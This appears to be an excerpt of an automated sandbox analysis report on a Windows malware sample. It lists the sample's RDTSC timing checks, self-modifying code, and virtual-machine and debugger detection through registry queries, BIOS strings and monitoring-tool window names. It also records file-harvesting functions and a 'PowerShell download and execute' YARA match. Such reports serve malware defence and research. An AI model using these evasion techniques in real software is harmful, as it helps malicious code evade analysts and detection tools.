                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8AF9 second address: 8E8B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1C3h 0x00000009 jns 00007F57D451A1B6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8B16 second address: 8E8B29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134DFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8B29 second address: 8E8B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F57D451A1BEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8B41 second address: 8E8B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F56FB second address: 8F5726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1C8h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c ja 00007F57D451A1BCh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F52C0 second address: 8F52E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D4F134E7h 0x00000009 jl 00007F57D4F134D6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F52E1 second address: 8F52E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA68B second address: 8FA692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA692 second address: 8FA6AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1C6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA227 second address: 8FA22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA22F second address: 8FA233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA233 second address: 8FA23D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F57D4F134D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA361 second address: 8FA368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FEED9 second address: 8FEEDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FEEDF second address: 8FEEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FEEE3 second address: 8FEEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E1AB second address: 90E1AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E1AF second address: 90E1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E1B7 second address: 90E1C9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F57D451A1BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E1C9 second address: 90E1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CA8C second address: 90CAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F57D451A1C2h 0x0000000d jne 00007F57D451A1B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CAA1 second address: 90CAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F57D4F134D6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CAAD second address: 90CAB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CAB1 second address: 90CAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CAB7 second address: 90CAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CC61 second address: 90CC65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CC65 second address: 90CC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F57D451A1C4h 0x0000000e pop ecx 0x0000000f jo 00007F57D451A1C2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CC8B second address: 90CC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CF1B second address: 90CF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DE72 second address: 90DEA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 jne 00007F57D4F134DCh 0x0000000f jns 00007F57D4F134D6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F57D4F134DFh 0x0000001d jmp 00007F57D4F134DBh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9141D0 second address: 9141D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91BB80 second address: 91BB8A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F57D4F134DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91BB8A second address: 91BB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91BB91 second address: 91BBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F57D4F134D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FB43 second address: 92FB47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9323C5 second address: 9323D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9323D2 second address: 9323E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1BAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9323E2 second address: 9323E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9323E6 second address: 9323FC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F57D451A1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F57D451A1B8h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93257E second address: 932584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932584 second address: 9325A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F57D451A1C9h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9325A2 second address: 9325B7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F57D4F134DCh 0x00000008 jnl 00007F57D4F134D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942175 second address: 9421A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C8h 0x00000007 jl 00007F57D451A1B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9421A2 second address: 9421A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9411AE second address: 9411B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9411B2 second address: 9411CA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F57D4F134D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jno 00007F57D4F134D6h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9411CA second address: 9411CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9411CE second address: 9411D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941358 second address: 94135D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94135D second address: 941363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941A66 second address: 941A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941A6C second address: 941A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941A71 second address: 941A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1BBh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94378F second address: 943793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94756C second address: 94758C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F57D451A1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F57D451A1B6h 0x00000011 jnl 00007F57D451A1B6h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f pop ecx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947AAE second address: 947AF2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 je 00007F57D4F134EAh 0x0000000f jmp 00007F57D4F134E4h 0x00000014 pop ecx 0x00000015 nop 0x00000016 push dword ptr [ebp+122D29EDh] 0x0000001c mov edx, dword ptr [ebp+122D19F6h] 0x00000022 push 2C5B36C4h 0x00000027 push eax 0x00000028 push edx 0x00000029 je 00007F57D4F134DCh 0x0000002f js 00007F57D4F134D6h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AE88 second address: 94AE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AE92 second address: 94AE9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F57D4F134D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AE9C second address: 94AEC4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jbe 00007F57D451A1B6h 0x0000000d jmp 00007F57D451A1BCh 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007F57D451A1B6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AEC4 second address: 94AEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AEC8 second address: 94AECE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AECE second address: 94AED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AED4 second address: 94AED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40312 second address: 4D40316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40316 second address: 4D4031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4031C second address: 4D40358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 9C86h 0x00000007 mov esi, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F57D4F134E9h 0x00000012 mov ebp, esp 0x00000014 jmp 00007F57D4F134DEh 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40358 second address: 4D40371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F57D451A1C3h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6C1B93 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6C1ACE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8EE913 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089171F rdtsc 0_2_0089171F
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00474910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00474910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0046DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0046E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00474570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00474570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0046ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0046BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0046DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004616D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046F68A FindFirstFileA,0_2_0046F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00473EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00473EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0046F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00461160 GetSystemInfo,ExitProcess,0_2_00461160
                Source: file.exe, file.exe, 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwaree?c
                Source: file.exe, 00000000.00000002.2094357724.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094357724.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2094357724.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*
                Source: file.exe, 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13753
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13734
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13731
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13745
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13785
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089171F rdtsc 0_2_0089171F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004645C0 VirtualProtect ?,00000004,00000100,000000000_2_004645C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00479860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00479860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00479750 mov eax, dword ptr fs:[00000030h]0_2_00479750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00477850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00477850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5588, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00479600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00479600
                Source: file.exe, 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: iProgram Manager
                Source: file.exeBinary or memory string: iProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00477B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00476920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00477850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00477850
